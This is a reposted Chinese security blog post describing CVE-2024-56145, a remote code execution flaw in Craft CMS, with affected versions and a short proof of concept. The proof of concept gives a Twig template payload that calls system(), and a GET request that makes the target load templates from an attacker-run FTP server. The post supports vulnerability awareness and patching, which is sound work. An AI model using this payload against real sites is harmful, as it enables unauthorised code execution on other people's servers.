CVE-2024-56145|Craft CMS远程代码执行漏洞(POC)

admin 2024年12月28日22:14:11评论120 views字数 1041阅读3分28秒阅读模式

0x00 前言

Craft CMS是一个开源的内容管理系统,它专注于用户友好的内容创建过程,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。

Craft界面简洁优雅,逻辑清晰明了,是一个高度自由,高度自定义设计的平台。虽然不需要专业的编程知识,要对模板语法有所了解才能很好的使用。

0x01 漏洞描述

如果受影响版本的Craft CMS用户的php.ini配置文件中启用了"register_argc_argv",未授权攻击者可以利用漏洞执行任意代码。

0x02 CVE编号

CVE-2024-56145

0x03 影响版本

5.0.0-RC1 ≤ Craft CMS < 5.5.24.0.0-RC1 ≤ Craft CMS < 4.13.23.0.0 ≤ Craft CMS < 3.9.14

0x04 漏洞详情

利用条件:

1. 创建允许匿名访问的FTP服务器,写入default/index.twig使网站可以访问

2. index.twig文件内容是:{{ ['system''id'] | sort('call_user_func') }}

3. php.ini配置启用了“register_argc_argv”

GET /?--templatesPath=ftp://a:[email protected]:2121/ HTTP/1.1Host: localhost:8000...HTTP/1.1200 OKServer: nginxDate: Tue, 19 Nov 202400:10:50 GMTContent-Type: text/html; charset=UTF-8Connection: keep-aliveVary: Accept-EncodingX-Powered-By: Craft CMSX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: no-referrer-when-downgradeContent-Length: 15
CVE-2024-56145|Craft CMS远程代码执行漏洞(POC)

0x05 参考链接

https://github.com/Chocapikk/CVE-2024-56145

https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9

原文始发于微信公众号(信安百科):CVE-2024-56145|Craft CMS远程代码执行漏洞(POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月28日22:14:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-56145|Craft CMS远程代码执行漏洞(POC)https://cn-sec.com/archives/3565853.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息